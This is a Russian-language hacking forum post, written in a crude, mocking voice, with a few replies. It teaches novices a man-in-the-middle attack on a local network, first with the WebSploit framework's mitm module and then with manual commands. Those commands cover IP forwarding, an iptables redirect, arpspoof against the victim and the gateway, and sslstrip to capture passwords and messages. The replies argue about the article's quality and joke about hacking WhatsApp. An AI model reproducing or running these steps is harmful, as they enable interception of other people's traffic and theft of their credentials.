Кароч катать новую нееееее. А вот новое это хорошо забытое старое И так мой дорогой не образованый человечешк, о господи, не бумай что я тебе что-то не обычно расскажу , на против , старая затёртая до дырень тема, но раз ты такой глупый что сам не дошёл до этого , то я тебе раскажу новое для тебя. Присаживайся по удобнее и наслождайся. Ха, тебя от слово Linux треханёт несколько раз, да ты и с виндой-то не очень ,но не беда полная автоматика Я тебе расскажу способ для ленивых, или для тех кто ценит своё время, или те кото любит автоматику И так Framework WebSploit Давай друг, открой терминал и напиши websploit , ты наверное догодался что это первая команда И теперь надо узнать что нам предлагают , чем богат этот фраемворк. Вторая команда show modules . Web Modules Description -----------------— —-----------------— web/apache_users Scan Directory Of Apache Users web/dir_scanner Directory Scanner web/wmap Information Gathering From Victim Web Using (Metasploit Wmap) web/pma PHPMyAdmin Login Page Scanner web/cloudflare_resolver CloudFlare Resolver Network Modules Description -----------------— —-----------------— network/arp_dos ARP Cache Denial Of Service Attack network/mfod Middle Finger Of Doom Attack network/mitm Man In The Middle Attack network/mlitm Man Left In The Middle Attack network/webkiller TCP Kill Attack network/fakeupdate Fake Update Attack Using DNS Spoof network/arp_poisoner Arp Poisoner Exploit Modules Description -----------------— —-----------------— exploit/autopwn Metasploit Autopwn Service exploit/browser_autopwn Metasploit Browser Autopwn Service exploit/java_applet Java Applet Attack (Using HTML) Wireless / Bluetooth Modules Description -----------------— —-----------------— wifi/wifi_jammer Wifi Jammer wifi/wifi_dos Wifi Dos Attack wifi/wifi_honeypot Wireless Honeypot(Fake AP) bluetooth/bluetooth_pod Bluetooth Ping Of Death Attack О боже мой, как всего много . Ну ты же мужик, у тебя есть логик в отличии от баб . Да я знаю ты догодался что нам нужно , да чётр, ты прaв network/mitm нам нужен тРетья команда use network/mitm И ты заметел что кое-что поменялось , а именно мы вошли в mitm wsf:MITM четвёртая команда show options // узнаем какие настройки доступны Interface eth0 yes Network Interface Name ROUTER 192.168.1.1 yes Router IP Address TARGET 192.168.1.2 yes Target IP Address SNIFFER driftnet yes Sniffer Name (Select From Sniffer List) SSL true yes SSLStrip, For SSL Hijacking(true or false) Sniffers Description ----------— —----------— dsniff Sniff All Passwords msgsnarf Sniff All Text Of Victim Messengers urlsnarf Sniff Victim Links driftnet Sniff Victim Images ----------------------------------------------------— хочу сказать , так как у все разное будет , у меня Interface wlan1 у тебя может быть другой. А так же ROUTER.TARGET будут другие . у меня роутер 192,168,1,1 и TARGET 192,168,1,50(Ты же не забыл команду которую я давай в прошлой статье ifconfig) ------------------------------------------------------------— Четвёртая команда set Interface // меняй на свой интерфасе Пятая команда set TARGET // iP жертвы Шестая RUN ---------------------------------------------------------------------------------------— будь умницей , кастати можешь запустить ешё wireshark и хватать пароли Часть два Всё это хуйня , настоящий карэр пишит всё сам ручками , пожтому я решил не пологаться на ебанную, не стабильную автоматики, и пишу часть два. Ну что ,приступим! Первая команда echo 1 > /proc/sys/net/ipv4/ip_forward // Включаем форвардинг пакетов , те кто не знают гуглите. Хотя, не забивай голову,а просто коприруй команды в терминал . проверем включили или нет, так как в бак траке по одному, в кали по другому Команда два, не обезательна /proc/sys/net/ipv4/ip_forward // должна быть 1 - единичка Команда три . iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 8080 // разрешаем перенаправление с 80 на 8080 порт . iptables это что-то типа брандмаура в винде . Кое что уясним: ip роутера , или шлюза будет 10,1,1,1 ip Жертвы 10,1,1,101 Наш ip 10,1,1,1254 . А выход в сеть я буду изпользовать wi-fi (WLAN0) Ну что четвёрая команда arpspoof -i wlan0 -t 10.1.1.101 10.1.1.1 & arpspoof -i wlan0 10.1.1.1 10.1.1.101 /// Первая команда для Для ARP Spoof жертвы; Вторая Для ARP Spoof шлюз маршрутизатора. Опа, мы с тобой обединили команды с помощью & как ты догодался это И Ну что дружок , пора снифер ставить sslstrip -k -l 8080 И всё . Кстати, у кого есть профиль на эксплоите.ин, найдите мою 2ю стать., там вроде начало лучше
ЯНИХЕРАНЕПОНЯЛ.... Почему Вебсплойт используется для Митм атаки? Мета расовоневерно? При слове Вебсплойт у меня сразу ассоциации про ЦМС или ПМС системы .. а тут херак и опускают до LAN уровня... Вобщем НИЗАЧОД статья высасана из пальца абы было.... На пересдачу осенью прийдёте...
Таки то классно что ты нихера не понял, этого и надо, статья то есть, кто в тебе тот знает, кто нет, по пошли нахуй. Стиль многих статей, кто в теме , тот знает, веил, ты был на хакере, похож стиль?
Кто в теме, тому статьи невпились, достаточно понимая сути просиходящего. А чем автоматизировать, то это уже насрано кучей. Хоть свои пиши , хоть готовым.
Именно. Кто в теме тому не надо. А вот кому надо ничего не поймёт. Так раньше и писали мануалы. Для кого не понятно.
Нормуль. Осталось тебе описать взлом Ватсапа с помощью метасплоита и статья триллионик тебе обеспечена. У нубов будет по миллиону просмотров каждый денЬ, траффик ачата просядет.